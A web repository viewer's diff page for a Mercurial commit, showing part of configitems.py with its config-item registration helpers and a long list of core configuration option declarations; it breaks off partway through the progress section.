##// END OF EJS Templates
util: provide a helper function to estimate RAM size...
Joerg Sonnenberger -
r45607:cfe0f491 default draft
parent child Browse files
Show More
@@ -1,1578 +1,1582 b''
1 1 # configitems.py - centralized declaration of configuration option
2 2 #
3 3 # Copyright 2017 Pierre-Yves David <pierre-yves.david@octobus.net>
4 4 #
5 5 # This software may be used and distributed according to the terms of the
6 6 # GNU General Public License version 2 or any later version.
7 7
8 8 from __future__ import absolute_import
9 9
10 10 import functools
11 11 import re
12 12
13 13 from . import (
14 14 encoding,
15 15 error,
16 16 )
17 17
18 18
def loadconfigtable(ui, extname, configtable):
    """Merge an extension's config declarations into the ui's known items.

    For every section in ``configtable``, items already known to the ui
    trigger a devel warning (an extension is overwriting a declaration),
    then the extension's items are registered under that section.
    """
    for section, items in sorted(configtable.items()):
        register = ui._knownconfig.setdefault(section, itemregister())
        # warn about collisions with already-registered items, in a
        # deterministic order
        for key in sorted(set(register) & set(items)):
            msg = b"extension '%s' overwrite config item '%s.%s'" % (
                extname,
                section,
                key,
            )
            ui.develwarn(msg, config=b'warn-config')
        register.update(items)
31 31
32 32
class configitem(object):
    """Declaration of a single known configuration item.

    :section: the official config section where to find this item,
    :name: the official name within the section,
    :default: default value for this item,
    :alias: optional list of (section, name) tuples accepted as alternatives,
    :generic: when true, ``name`` is a regular expression matched against keys.
    """

    def __init__(
        self,
        section,
        name,
        default=None,
        alias=(),
        generic=False,
        priority=0,
        experimental=False,
    ):
        self.section = section
        self.name = name
        self.default = default
        self.alias = list(alias)
        self.generic = generic
        self.priority = priority
        self.experimental = experimental
        # generic items are looked up by pattern, so pre-compile the name
        self._re = re.compile(name) if generic else None
63 63
64 64
class itemregister(dict):
    """A dict of config items that also supports wild-card (generic) lookup."""

    def __init__(self):
        super(itemregister, self).__init__()
        # generic (pattern-based) items, consulted when no exact match wins
        self._generics = set()

    def update(self, other):
        super(itemregister, self).update(other)
        self._generics.update(other._generics)

    def __setitem__(self, key, item):
        super(itemregister, self).__setitem__(key, item)
        if item.generic:
            self._generics.add(item)

    def get(self, key):
        exact = super(itemregister, self).get(key)
        if exact is not None and not exact.generic:
            return exact

        # No concrete item: try the generic definitions, lowest priority
        # value first, ties broken by name for determinism.
        for item in sorted(self._generics, key=lambda i: (i.priority, i.name)):
            # 'match' (anchored at the start) is used instead of 'search'
            # so that simple patterns behave predictably for people who are
            # not regex-savvy: "color\..*" will not fire on an unrelated
            # key that merely contains "color." somewhere.  The tradeoff is
            # that sub-string matches need an explicit ".*" prefix, which
            # is less error prone than requiring "^" on most patterns.
            if item._re.match(key):
                return item

        return None
104 104
105 105
106 106 coreitems = {}
107 107
108 108
def _register(configtable, *args, **kwargs):
    """Build a configitem from ``args``/``kwargs`` and file it in ``configtable``.

    Raises a ProgrammingError when the same section/name pair is declared
    twice.
    """
    item = configitem(*args, **kwargs)
    register = configtable.setdefault(item.section, itemregister())
    if item.name in register:
        raise error.ProgrammingError(
            b"duplicated config item registration for '%s.%s'"
            % (item.section, item.name)
        )
    register[item.name] = item
116 116
117 117
# special value for case where the default is derived from other values
# (a unique sentinel: compared by identity, never a meaningful value itself)
dynamicdefault = object()
120 120
121 121 # Registering actual config items
122 122
123 123
def getitemregister(configtable):
    """Return a registration function bound to ``configtable``.

    The returned callable is ``_register`` with the table pre-supplied;
    ``dynamicdefault`` is re-exported on it as a pseudo enum so callers can
    write ``configitem.dynamicdefault``.
    """
    register = functools.partial(_register, configtable)
    # export pseudo enum as configitem.*
    register.dynamicdefault = dynamicdefault
    return register
129 129
130 130
131 131 coreconfigitem = getitemregister(coreitems)
132 132
133 133
def _registerdiffopts(section, configprefix=b''):
    """Register the standard diff-related options under ``section``.

    ``configprefix`` is prepended to every option name, allowing the same
    family of items to be declared for sub-namespaces such as
    ``commands.commit.interactive.``.
    """
    for suffix, default in [
        (b'nodates', False),
        (b'showfunc', False),
        (b'unified', None),
        (b'git', False),
        (b'ignorews', False),
        (b'ignorewsamount', False),
        (b'ignoreblanklines', False),
        (b'ignorewseol', False),
        (b'nobinary', False),
        (b'noprefix', False),
        (b'word-diff', False),
    ]:
        coreconfigitem(
            section, configprefix + suffix, default=default,
        )
168 168
169 169
170 170 coreconfigitem(
171 171 b'alias', b'.*', default=dynamicdefault, generic=True,
172 172 )
173 173 coreconfigitem(
174 174 b'auth', b'cookiefile', default=None,
175 175 )
176 176 _registerdiffopts(section=b'annotate')
177 177 # bookmarks.pushing: internal hack for discovery
178 178 coreconfigitem(
179 179 b'bookmarks', b'pushing', default=list,
180 180 )
181 181 # bundle.mainreporoot: internal hack for bundlerepo
182 182 coreconfigitem(
183 183 b'bundle', b'mainreporoot', default=b'',
184 184 )
185 185 coreconfigitem(
186 186 b'censor', b'policy', default=b'abort', experimental=True,
187 187 )
188 188 coreconfigitem(
189 189 b'chgserver', b'idletimeout', default=3600,
190 190 )
191 191 coreconfigitem(
192 192 b'chgserver', b'skiphash', default=False,
193 193 )
194 194 coreconfigitem(
195 195 b'cmdserver', b'log', default=None,
196 196 )
197 197 coreconfigitem(
198 198 b'cmdserver', b'max-log-files', default=7,
199 199 )
200 200 coreconfigitem(
201 201 b'cmdserver', b'max-log-size', default=b'1 MB',
202 202 )
203 203 coreconfigitem(
204 204 b'cmdserver', b'max-repo-cache', default=0, experimental=True,
205 205 )
206 206 coreconfigitem(
207 207 b'cmdserver', b'message-encodings', default=list,
208 208 )
209 209 coreconfigitem(
210 210 b'cmdserver',
211 211 b'track-log',
212 212 default=lambda: [b'chgserver', b'cmdserver', b'repocache'],
213 213 )
214 214 coreconfigitem(
215 215 b'cmdserver', b'shutdown-on-interrupt', default=True,
216 216 )
217 217 coreconfigitem(
218 218 b'color', b'.*', default=None, generic=True,
219 219 )
220 220 coreconfigitem(
221 221 b'color', b'mode', default=b'auto',
222 222 )
223 223 coreconfigitem(
224 224 b'color', b'pagermode', default=dynamicdefault,
225 225 )
226 226 _registerdiffopts(section=b'commands', configprefix=b'commit.interactive.')
227 227 coreconfigitem(
228 228 b'commands', b'commit.post-status', default=False,
229 229 )
230 230 coreconfigitem(
231 231 b'commands', b'grep.all-files', default=False, experimental=True,
232 232 )
233 233 coreconfigitem(
234 234 b'commands', b'merge.require-rev', default=False,
235 235 )
236 236 coreconfigitem(
237 237 b'commands', b'push.require-revs', default=False,
238 238 )
239 239 coreconfigitem(
240 240 b'commands', b'resolve.confirm', default=False,
241 241 )
242 242 coreconfigitem(
243 243 b'commands', b'resolve.explicit-re-merge', default=False,
244 244 )
245 245 coreconfigitem(
246 246 b'commands', b'resolve.mark-check', default=b'none',
247 247 )
248 248 _registerdiffopts(section=b'commands', configprefix=b'revert.interactive.')
249 249 coreconfigitem(
250 250 b'commands', b'show.aliasprefix', default=list,
251 251 )
252 252 coreconfigitem(
253 253 b'commands', b'status.relative', default=False,
254 254 )
255 255 coreconfigitem(
256 256 b'commands', b'status.skipstates', default=[], experimental=True,
257 257 )
258 258 coreconfigitem(
259 259 b'commands', b'status.terse', default=b'',
260 260 )
261 261 coreconfigitem(
262 262 b'commands', b'status.verbose', default=False,
263 263 )
264 264 coreconfigitem(
265 265 b'commands', b'update.check', default=None,
266 266 )
267 267 coreconfigitem(
268 268 b'commands', b'update.requiredest', default=False,
269 269 )
270 270 coreconfigitem(
271 271 b'committemplate', b'.*', default=None, generic=True,
272 272 )
273 273 coreconfigitem(
274 274 b'convert', b'bzr.saverev', default=True,
275 275 )
276 276 coreconfigitem(
277 277 b'convert', b'cvsps.cache', default=True,
278 278 )
279 279 coreconfigitem(
280 280 b'convert', b'cvsps.fuzz', default=60,
281 281 )
282 282 coreconfigitem(
283 283 b'convert', b'cvsps.logencoding', default=None,
284 284 )
285 285 coreconfigitem(
286 286 b'convert', b'cvsps.mergefrom', default=None,
287 287 )
288 288 coreconfigitem(
289 289 b'convert', b'cvsps.mergeto', default=None,
290 290 )
291 291 coreconfigitem(
292 292 b'convert', b'git.committeractions', default=lambda: [b'messagedifferent'],
293 293 )
294 294 coreconfigitem(
295 295 b'convert', b'git.extrakeys', default=list,
296 296 )
297 297 coreconfigitem(
298 298 b'convert', b'git.findcopiesharder', default=False,
299 299 )
300 300 coreconfigitem(
301 301 b'convert', b'git.remoteprefix', default=b'remote',
302 302 )
303 303 coreconfigitem(
304 304 b'convert', b'git.renamelimit', default=400,
305 305 )
306 306 coreconfigitem(
307 307 b'convert', b'git.saverev', default=True,
308 308 )
309 309 coreconfigitem(
310 310 b'convert', b'git.similarity', default=50,
311 311 )
312 312 coreconfigitem(
313 313 b'convert', b'git.skipsubmodules', default=False,
314 314 )
315 315 coreconfigitem(
316 316 b'convert', b'hg.clonebranches', default=False,
317 317 )
318 318 coreconfigitem(
319 319 b'convert', b'hg.ignoreerrors', default=False,
320 320 )
321 321 coreconfigitem(
322 322 b'convert', b'hg.preserve-hash', default=False,
323 323 )
324 324 coreconfigitem(
325 325 b'convert', b'hg.revs', default=None,
326 326 )
327 327 coreconfigitem(
328 328 b'convert', b'hg.saverev', default=False,
329 329 )
330 330 coreconfigitem(
331 331 b'convert', b'hg.sourcename', default=None,
332 332 )
333 333 coreconfigitem(
334 334 b'convert', b'hg.startrev', default=None,
335 335 )
336 336 coreconfigitem(
337 337 b'convert', b'hg.tagsbranch', default=b'default',
338 338 )
339 339 coreconfigitem(
340 340 b'convert', b'hg.usebranchnames', default=True,
341 341 )
342 342 coreconfigitem(
343 343 b'convert', b'ignoreancestorcheck', default=False, experimental=True,
344 344 )
345 345 coreconfigitem(
346 346 b'convert', b'localtimezone', default=False,
347 347 )
348 348 coreconfigitem(
349 349 b'convert', b'p4.encoding', default=dynamicdefault,
350 350 )
351 351 coreconfigitem(
352 352 b'convert', b'p4.startrev', default=0,
353 353 )
354 354 coreconfigitem(
355 355 b'convert', b'skiptags', default=False,
356 356 )
357 357 coreconfigitem(
358 358 b'convert', b'svn.debugsvnlog', default=True,
359 359 )
360 360 coreconfigitem(
361 361 b'convert', b'svn.trunk', default=None,
362 362 )
363 363 coreconfigitem(
364 364 b'convert', b'svn.tags', default=None,
365 365 )
366 366 coreconfigitem(
367 367 b'convert', b'svn.branches', default=None,
368 368 )
369 369 coreconfigitem(
370 370 b'convert', b'svn.startrev', default=0,
371 371 )
372 372 coreconfigitem(
373 373 b'debug', b'dirstate.delaywrite', default=0,
374 374 )
375 375 coreconfigitem(
376 376 b'defaults', b'.*', default=None, generic=True,
377 377 )
378 378 coreconfigitem(
379 379 b'devel', b'all-warnings', default=False,
380 380 )
381 381 coreconfigitem(
382 382 b'devel', b'bundle2.debug', default=False,
383 383 )
384 384 coreconfigitem(
385 385 b'devel', b'bundle.delta', default=b'',
386 386 )
387 387 coreconfigitem(
388 388 b'devel', b'cache-vfs', default=None,
389 389 )
390 390 coreconfigitem(
391 391 b'devel', b'check-locks', default=False,
392 392 )
393 393 coreconfigitem(
394 394 b'devel', b'check-relroot', default=False,
395 395 )
396 396 coreconfigitem(
397 397 b'devel', b'default-date', default=None,
398 398 )
399 399 coreconfigitem(
400 400 b'devel', b'deprec-warn', default=False,
401 401 )
402 402 coreconfigitem(
403 403 b'devel', b'disableloaddefaultcerts', default=False,
404 404 )
405 405 coreconfigitem(
406 406 b'devel', b'warn-empty-changegroup', default=False,
407 407 )
408 408 coreconfigitem(
409 409 b'devel', b'legacy.exchange', default=list,
410 410 )
411 411 coreconfigitem(
412 412 b'devel', b'persistent-nodemap', default=False,
413 413 )
414 414 coreconfigitem(
415 415 b'devel', b'servercafile', default=b'',
416 416 )
417 417 coreconfigitem(
418 418 b'devel', b'serverexactprotocol', default=b'',
419 419 )
420 420 coreconfigitem(
421 421 b'devel', b'serverrequirecert', default=False,
422 422 )
423 423 coreconfigitem(
424 424 b'devel', b'strip-obsmarkers', default=True,
425 425 )
426 426 coreconfigitem(
427 427 b'devel', b'warn-config', default=None,
428 428 )
429 429 coreconfigitem(
430 430 b'devel', b'warn-config-default', default=None,
431 431 )
432 432 coreconfigitem(
433 433 b'devel', b'user.obsmarker', default=None,
434 434 )
435 435 coreconfigitem(
436 436 b'devel', b'warn-config-unknown', default=None,
437 437 )
438 438 coreconfigitem(
439 439 b'devel', b'debug.copies', default=False,
440 440 )
441 441 coreconfigitem(
442 442 b'devel', b'debug.extensions', default=False,
443 443 )
444 444 coreconfigitem(
445 445 b'devel', b'debug.repo-filters', default=False,
446 446 )
447 447 coreconfigitem(
448 448 b'devel', b'debug.peer-request', default=False,
449 449 )
450 450 coreconfigitem(
451 451 b'devel', b'discovery.randomize', default=True,
452 452 )
453 453 _registerdiffopts(section=b'diff')
454 454 coreconfigitem(
455 455 b'email', b'bcc', default=None,
456 456 )
457 457 coreconfigitem(
458 458 b'email', b'cc', default=None,
459 459 )
460 460 coreconfigitem(
461 461 b'email', b'charsets', default=list,
462 462 )
463 463 coreconfigitem(
464 464 b'email', b'from', default=None,
465 465 )
466 466 coreconfigitem(
467 467 b'email', b'method', default=b'smtp',
468 468 )
469 469 coreconfigitem(
470 470 b'email', b'reply-to', default=None,
471 471 )
472 472 coreconfigitem(
473 473 b'email', b'to', default=None,
474 474 )
475 475 coreconfigitem(
476 476 b'experimental', b'archivemetatemplate', default=dynamicdefault,
477 477 )
478 478 coreconfigitem(
479 479 b'experimental', b'auto-publish', default=b'publish',
480 480 )
481 481 coreconfigitem(
482 482 b'experimental', b'bundle-phases', default=False,
483 483 )
484 484 coreconfigitem(
485 485 b'experimental', b'bundle2-advertise', default=True,
486 486 )
487 487 coreconfigitem(
488 488 b'experimental', b'bundle2-output-capture', default=False,
489 489 )
490 490 coreconfigitem(
491 491 b'experimental', b'bundle2.pushback', default=False,
492 492 )
493 493 coreconfigitem(
494 494 b'experimental', b'bundle2lazylocking', default=False,
495 495 )
496 496 coreconfigitem(
497 497 b'experimental', b'bundlecomplevel', default=None,
498 498 )
499 499 coreconfigitem(
500 500 b'experimental', b'bundlecomplevel.bzip2', default=None,
501 501 )
502 502 coreconfigitem(
503 503 b'experimental', b'bundlecomplevel.gzip', default=None,
504 504 )
505 505 coreconfigitem(
506 506 b'experimental', b'bundlecomplevel.none', default=None,
507 507 )
508 508 coreconfigitem(
509 509 b'experimental', b'bundlecomplevel.zstd', default=None,
510 510 )
511 511 coreconfigitem(
512 512 b'experimental', b'changegroup3', default=False,
513 513 )
514 514 coreconfigitem(
515 515 b'experimental', b'cleanup-as-archived', default=False,
516 516 )
517 517 coreconfigitem(
518 518 b'experimental', b'clientcompressionengines', default=list,
519 519 )
520 520 coreconfigitem(
521 521 b'experimental', b'copytrace', default=b'on',
522 522 )
523 523 coreconfigitem(
524 524 b'experimental', b'copytrace.movecandidateslimit', default=100,
525 525 )
526 526 coreconfigitem(
527 527 b'experimental', b'copytrace.sourcecommitlimit', default=100,
528 528 )
529 529 coreconfigitem(
530 530 b'experimental', b'copies.read-from', default=b"filelog-only",
531 531 )
532 532 coreconfigitem(
533 533 b'experimental', b'copies.write-to', default=b'filelog-only',
534 534 )
535 535 coreconfigitem(
536 536 b'experimental', b'crecordtest', default=None,
537 537 )
538 538 coreconfigitem(
539 539 b'experimental', b'directaccess', default=False,
540 540 )
541 541 coreconfigitem(
542 542 b'experimental', b'directaccess.revnums', default=False,
543 543 )
544 544 coreconfigitem(
545 545 b'experimental', b'editortmpinhg', default=False,
546 546 )
547 547 coreconfigitem(
548 548 b'experimental', b'evolution', default=list,
549 549 )
550 550 coreconfigitem(
551 551 b'experimental',
552 552 b'evolution.allowdivergence',
553 553 default=False,
554 554 alias=[(b'experimental', b'allowdivergence')],
555 555 )
556 556 coreconfigitem(
557 557 b'experimental', b'evolution.allowunstable', default=None,
558 558 )
559 559 coreconfigitem(
560 560 b'experimental', b'evolution.createmarkers', default=None,
561 561 )
562 562 coreconfigitem(
563 563 b'experimental',
564 564 b'evolution.effect-flags',
565 565 default=True,
566 566 alias=[(b'experimental', b'effect-flags')],
567 567 )
568 568 coreconfigitem(
569 569 b'experimental', b'evolution.exchange', default=None,
570 570 )
571 571 coreconfigitem(
572 572 b'experimental', b'evolution.bundle-obsmarker', default=False,
573 573 )
574 574 coreconfigitem(
575 575 b'experimental', b'log.topo', default=False,
576 576 )
577 577 coreconfigitem(
578 578 b'experimental', b'evolution.report-instabilities', default=True,
579 579 )
580 580 coreconfigitem(
581 581 b'experimental', b'evolution.track-operation', default=True,
582 582 )
583 583 # repo-level config to exclude a revset visibility
584 584 #
585 585 # The target use case is to use `share` to expose different subset of the same
586 586 # repository, especially server side. See also `server.view`.
587 587 coreconfigitem(
588 588 b'experimental', b'extra-filter-revs', default=None,
589 589 )
590 590 coreconfigitem(
591 591 b'experimental', b'maxdeltachainspan', default=-1,
592 592 )
593 593 coreconfigitem(
594 594 b'experimental', b'mergetempdirprefix', default=None,
595 595 )
596 596 coreconfigitem(
597 597 b'experimental', b'mmapindexthreshold', default=None,
598 598 )
599 599 coreconfigitem(
600 600 b'experimental', b'narrow', default=False,
601 601 )
602 602 coreconfigitem(
603 603 b'experimental', b'nonnormalparanoidcheck', default=False,
604 604 )
605 605 coreconfigitem(
606 606 b'experimental', b'exportableenviron', default=list,
607 607 )
608 608 coreconfigitem(
609 609 b'experimental', b'extendedheader.index', default=None,
610 610 )
611 611 coreconfigitem(
612 612 b'experimental', b'extendedheader.similarity', default=False,
613 613 )
614 614 coreconfigitem(
615 615 b'experimental', b'graphshorten', default=False,
616 616 )
617 617 coreconfigitem(
618 618 b'experimental', b'graphstyle.parent', default=dynamicdefault,
619 619 )
620 620 coreconfigitem(
621 621 b'experimental', b'graphstyle.missing', default=dynamicdefault,
622 622 )
623 623 coreconfigitem(
624 624 b'experimental', b'graphstyle.grandparent', default=dynamicdefault,
625 625 )
626 626 coreconfigitem(
627 627 b'experimental', b'hook-track-tags', default=False,
628 628 )
629 629 coreconfigitem(
630 630 b'experimental', b'httppeer.advertise-v2', default=False,
631 631 )
632 632 coreconfigitem(
633 633 b'experimental', b'httppeer.v2-encoder-order', default=None,
634 634 )
635 635 coreconfigitem(
636 636 b'experimental', b'httppostargs', default=False,
637 637 )
638 638 coreconfigitem(
639 639 b'experimental', b'mergedriver', default=None,
640 640 )
641 641 coreconfigitem(b'experimental', b'nointerrupt', default=False)
642 642 coreconfigitem(b'experimental', b'nointerrupt-interactiveonly', default=True)
643 643
644 644 coreconfigitem(
645 645 b'experimental', b'obsmarkers-exchange-debug', default=False,
646 646 )
647 647 coreconfigitem(
648 648 b'experimental', b'remotenames', default=False,
649 649 )
650 650 coreconfigitem(
651 651 b'experimental', b'removeemptydirs', default=True,
652 652 )
653 653 coreconfigitem(
654 654 b'experimental', b'revert.interactive.select-to-keep', default=False,
655 655 )
656 656 coreconfigitem(
657 657 b'experimental', b'revisions.prefixhexnode', default=False,
658 658 )
659 659 coreconfigitem(
660 660 b'experimental', b'revlogv2', default=None,
661 661 )
662 662 coreconfigitem(
663 663 b'experimental', b'revisions.disambiguatewithin', default=None,
664 664 )
665 665 coreconfigitem(
666 666 b'experimental', b'rust.index', default=False,
667 667 )
668 668 coreconfigitem(
669 669 b'experimental', b'server.filesdata.recommended-batch-size', default=50000,
670 670 )
671 671 coreconfigitem(
672 672 b'experimental',
673 673 b'server.manifestdata.recommended-batch-size',
674 674 default=100000,
675 675 )
676 676 coreconfigitem(
677 677 b'experimental', b'server.stream-narrow-clones', default=False,
678 678 )
679 679 coreconfigitem(
680 680 b'experimental', b'single-head-per-branch', default=False,
681 681 )
682 682 coreconfigitem(
683 683 b'experimental',
684 684 b'single-head-per-branch:account-closed-heads',
685 685 default=False,
686 686 )
687 687 coreconfigitem(
688 688 b'experimental', b'sshserver.support-v2', default=False,
689 689 )
690 690 coreconfigitem(
691 691 b'experimental', b'sparse-read', default=False,
692 692 )
693 693 coreconfigitem(
694 694 b'experimental', b'sparse-read.density-threshold', default=0.50,
695 695 )
696 696 coreconfigitem(
697 697 b'experimental', b'sparse-read.min-gap-size', default=b'65K',
698 698 )
699 699 coreconfigitem(
700 700 b'experimental', b'treemanifest', default=False,
701 701 )
702 702 coreconfigitem(
703 703 b'experimental', b'update.atomic-file', default=False,
704 704 )
705 705 coreconfigitem(
706 706 b'experimental', b'sshpeer.advertise-v2', default=False,
707 707 )
708 708 coreconfigitem(
709 709 b'experimental', b'web.apiserver', default=False,
710 710 )
711 711 coreconfigitem(
712 712 b'experimental', b'web.api.http-v2', default=False,
713 713 )
714 714 coreconfigitem(
715 715 b'experimental', b'web.api.debugreflect', default=False,
716 716 )
717 717 coreconfigitem(
718 718 b'experimental', b'worker.wdir-get-thread-safe', default=False,
719 719 )
720 720 coreconfigitem(
721 721 b'experimental', b'worker.repository-upgrade', default=False,
722 722 )
723 723 coreconfigitem(
724 724 b'experimental', b'xdiff', default=False,
725 725 )
726 726 coreconfigitem(
727 727 b'extensions', b'.*', default=None, generic=True,
728 728 )
729 729 coreconfigitem(
730 730 b'extdata', b'.*', default=None, generic=True,
731 731 )
732 732 coreconfigitem(
733 733 b'format', b'bookmarks-in-store', default=False,
734 734 )
735 735 coreconfigitem(
736 736 b'format', b'chunkcachesize', default=None, experimental=True,
737 737 )
738 738 coreconfigitem(
739 739 b'format', b'dotencode', default=True,
740 740 )
741 741 coreconfigitem(
742 742 b'format', b'generaldelta', default=False, experimental=True,
743 743 )
744 744 coreconfigitem(
745 745 b'format', b'manifestcachesize', default=None, experimental=True,
746 746 )
747 747 coreconfigitem(
748 748 b'format', b'maxchainlen', default=dynamicdefault, experimental=True,
749 749 )
750 750 coreconfigitem(
751 751 b'format', b'obsstore-version', default=None,
752 752 )
753 753 coreconfigitem(
754 754 b'format', b'sparse-revlog', default=True,
755 755 )
756 756 coreconfigitem(
757 757 b'format',
758 758 b'revlog-compression',
759 759 default=lambda: [b'zlib'],
760 760 alias=[(b'experimental', b'format.compression')],
761 761 )
762 762 coreconfigitem(
763 763 b'format', b'usefncache', default=True,
764 764 )
765 765 coreconfigitem(
766 766 b'format', b'usegeneraldelta', default=True,
767 767 )
768 768 coreconfigitem(
769 769 b'format', b'usestore', default=True,
770 770 )
771 771 # Right now, the only efficient implement of the nodemap logic is in Rust, so
772 772 # the persistent nodemap feature needs to stay experimental as long as the Rust
773 773 # extensions are an experimental feature.
774 774 coreconfigitem(
775 775 b'format', b'use-persistent-nodemap', default=False, experimental=True
776 776 )
777 777 coreconfigitem(
778 778 b'format',
779 779 b'exp-use-copies-side-data-changeset',
780 780 default=False,
781 781 experimental=True,
782 782 )
783 783 coreconfigitem(
784 784 b'format', b'exp-use-side-data', default=False, experimental=True,
785 785 )
786 786 coreconfigitem(
787 787 b'format', b'internal-phase', default=False, experimental=True,
788 788 )
789 789 coreconfigitem(
790 790 b'fsmonitor', b'warn_when_unused', default=True,
791 791 )
792 792 coreconfigitem(
793 793 b'fsmonitor', b'warn_update_file_count', default=50000,
794 794 )
795 795 coreconfigitem(
796 796 b'help', br'hidden-command\..*', default=False, generic=True,
797 797 )
798 798 coreconfigitem(
799 799 b'help', br'hidden-topic\..*', default=False, generic=True,
800 800 )
801 801 coreconfigitem(
802 802 b'hooks', b'.*', default=dynamicdefault, generic=True,
803 803 )
804 804 coreconfigitem(
805 805 b'hgweb-paths', b'.*', default=list, generic=True,
806 806 )
807 807 coreconfigitem(
808 808 b'hostfingerprints', b'.*', default=list, generic=True,
809 809 )
810 810 coreconfigitem(
811 811 b'hostsecurity', b'ciphers', default=None,
812 812 )
813 813 coreconfigitem(
814 814 b'hostsecurity', b'minimumprotocol', default=dynamicdefault,
815 815 )
816 816 coreconfigitem(
817 817 b'hostsecurity',
818 818 b'.*:minimumprotocol$',
819 819 default=dynamicdefault,
820 820 generic=True,
821 821 )
822 822 coreconfigitem(
823 823 b'hostsecurity', b'.*:ciphers$', default=dynamicdefault, generic=True,
824 824 )
825 825 coreconfigitem(
826 826 b'hostsecurity', b'.*:fingerprints$', default=list, generic=True,
827 827 )
828 828 coreconfigitem(
829 829 b'hostsecurity', b'.*:verifycertsfile$', default=None, generic=True,
830 830 )
831 831
832 832 coreconfigitem(
833 833 b'http_proxy', b'always', default=False,
834 834 )
835 835 coreconfigitem(
836 836 b'http_proxy', b'host', default=None,
837 837 )
838 838 coreconfigitem(
839 839 b'http_proxy', b'no', default=list,
840 840 )
841 841 coreconfigitem(
842 842 b'http_proxy', b'passwd', default=None,
843 843 )
844 844 coreconfigitem(
845 845 b'http_proxy', b'user', default=None,
846 846 )
847 847
848 848 coreconfigitem(
849 849 b'http', b'timeout', default=None,
850 850 )
851 851
852 852 coreconfigitem(
853 853 b'logtoprocess', b'commandexception', default=None,
854 854 )
855 855 coreconfigitem(
856 856 b'logtoprocess', b'commandfinish', default=None,
857 857 )
858 858 coreconfigitem(
859 859 b'logtoprocess', b'command', default=None,
860 860 )
861 861 coreconfigitem(
862 862 b'logtoprocess', b'develwarn', default=None,
863 863 )
864 864 coreconfigitem(
865 865 b'logtoprocess', b'uiblocked', default=None,
866 866 )
867 867 coreconfigitem(
868 868 b'merge', b'checkunknown', default=b'abort',
869 869 )
870 870 coreconfigitem(
871 871 b'merge', b'checkignored', default=b'abort',
872 872 )
873 873 coreconfigitem(
874 874 b'experimental', b'merge.checkpathconflicts', default=False,
875 875 )
876 876 coreconfigitem(
877 877 b'merge', b'followcopies', default=True,
878 878 )
879 879 coreconfigitem(
880 880 b'merge', b'on-failure', default=b'continue',
881 881 )
882 882 coreconfigitem(
883 883 b'merge', b'preferancestor', default=lambda: [b'*'], experimental=True,
884 884 )
885 885 coreconfigitem(
886 886 b'merge', b'strict-capability-check', default=False,
887 887 )
888 888 coreconfigitem(
889 889 b'merge-tools', b'.*', default=None, generic=True,
890 890 )
891 891 coreconfigitem(
892 892 b'merge-tools',
893 893 br'.*\.args$',
894 894 default=b"$local $base $other",
895 895 generic=True,
896 896 priority=-1,
897 897 )
898 898 coreconfigitem(
899 899 b'merge-tools', br'.*\.binary$', default=False, generic=True, priority=-1,
900 900 )
901 901 coreconfigitem(
902 902 b'merge-tools', br'.*\.check$', default=list, generic=True, priority=-1,
903 903 )
904 904 coreconfigitem(
905 905 b'merge-tools',
906 906 br'.*\.checkchanged$',
907 907 default=False,
908 908 generic=True,
909 909 priority=-1,
910 910 )
911 911 coreconfigitem(
912 912 b'merge-tools',
913 913 br'.*\.executable$',
914 914 default=dynamicdefault,
915 915 generic=True,
916 916 priority=-1,
917 917 )
918 918 coreconfigitem(
919 919 b'merge-tools', br'.*\.fixeol$', default=False, generic=True, priority=-1,
920 920 )
921 921 coreconfigitem(
922 922 b'merge-tools', br'.*\.gui$', default=False, generic=True, priority=-1,
923 923 )
924 924 coreconfigitem(
925 925 b'merge-tools',
926 926 br'.*\.mergemarkers$',
927 927 default=b'basic',
928 928 generic=True,
929 929 priority=-1,
930 930 )
931 931 coreconfigitem(
932 932 b'merge-tools',
933 933 br'.*\.mergemarkertemplate$',
934 934 default=dynamicdefault, # take from ui.mergemarkertemplate
935 935 generic=True,
936 936 priority=-1,
937 937 )
938 938 coreconfigitem(
939 939 b'merge-tools', br'.*\.priority$', default=0, generic=True, priority=-1,
940 940 )
941 941 coreconfigitem(
942 942 b'merge-tools',
943 943 br'.*\.premerge$',
944 944 default=dynamicdefault,
945 945 generic=True,
946 946 priority=-1,
947 947 )
948 948 coreconfigitem(
949 949 b'merge-tools', br'.*\.symlink$', default=False, generic=True, priority=-1,
950 950 )
951 951 coreconfigitem(
952 952 b'pager', b'attend-.*', default=dynamicdefault, generic=True,
953 953 )
954 954 coreconfigitem(
955 955 b'pager', b'ignore', default=list,
956 956 )
957 957 coreconfigitem(
958 958 b'pager', b'pager', default=dynamicdefault,
959 959 )
960 960 coreconfigitem(
961 961 b'patch', b'eol', default=b'strict',
962 962 )
963 963 coreconfigitem(
964 964 b'patch', b'fuzz', default=2,
965 965 )
966 966 coreconfigitem(
967 967 b'paths', b'default', default=None,
968 968 )
969 969 coreconfigitem(
970 970 b'paths', b'default-push', default=None,
971 971 )
972 972 coreconfigitem(
973 973 b'paths', b'.*', default=None, generic=True,
974 974 )
975 975 coreconfigitem(
976 976 b'phases', b'checksubrepos', default=b'follow',
977 977 )
978 978 coreconfigitem(
979 979 b'phases', b'new-commit', default=b'draft',
980 980 )
981 981 coreconfigitem(
982 982 b'phases', b'publish', default=True,
983 983 )
984 984 coreconfigitem(
985 985 b'profiling', b'enabled', default=False,
986 986 )
987 987 coreconfigitem(
988 988 b'profiling', b'format', default=b'text',
989 989 )
990 990 coreconfigitem(
991 991 b'profiling', b'freq', default=1000,
992 992 )
993 993 coreconfigitem(
994 994 b'profiling', b'limit', default=30,
995 995 )
996 996 coreconfigitem(
997 997 b'profiling', b'nested', default=0,
998 998 )
999 999 coreconfigitem(
1000 1000 b'profiling', b'output', default=None,
1001 1001 )
1002 1002 coreconfigitem(
1003 1003 b'profiling', b'showmax', default=0.999,
1004 1004 )
1005 1005 coreconfigitem(
1006 1006 b'profiling', b'showmin', default=dynamicdefault,
1007 1007 )
1008 1008 coreconfigitem(
1009 1009 b'profiling', b'showtime', default=True,
1010 1010 )
1011 1011 coreconfigitem(
1012 1012 b'profiling', b'sort', default=b'inlinetime',
1013 1013 )
1014 1014 coreconfigitem(
1015 1015 b'profiling', b'statformat', default=b'hotpath',
1016 1016 )
1017 1017 coreconfigitem(
1018 1018 b'profiling', b'time-track', default=dynamicdefault,
1019 1019 )
1020 1020 coreconfigitem(
1021 1021 b'profiling', b'type', default=b'stat',
1022 1022 )
1023 1023 coreconfigitem(
1024 1024 b'progress', b'assume-tty', default=False,
1025 1025 )
1026 1026 coreconfigitem(
1027 1027 b'progress', b'changedelay', default=1,
1028 1028 )
1029 1029 coreconfigitem(
1030 1030 b'progress', b'clear-complete', default=True,
1031 1031 )
1032 1032 coreconfigitem(
1033 1033 b'progress', b'debug', default=False,
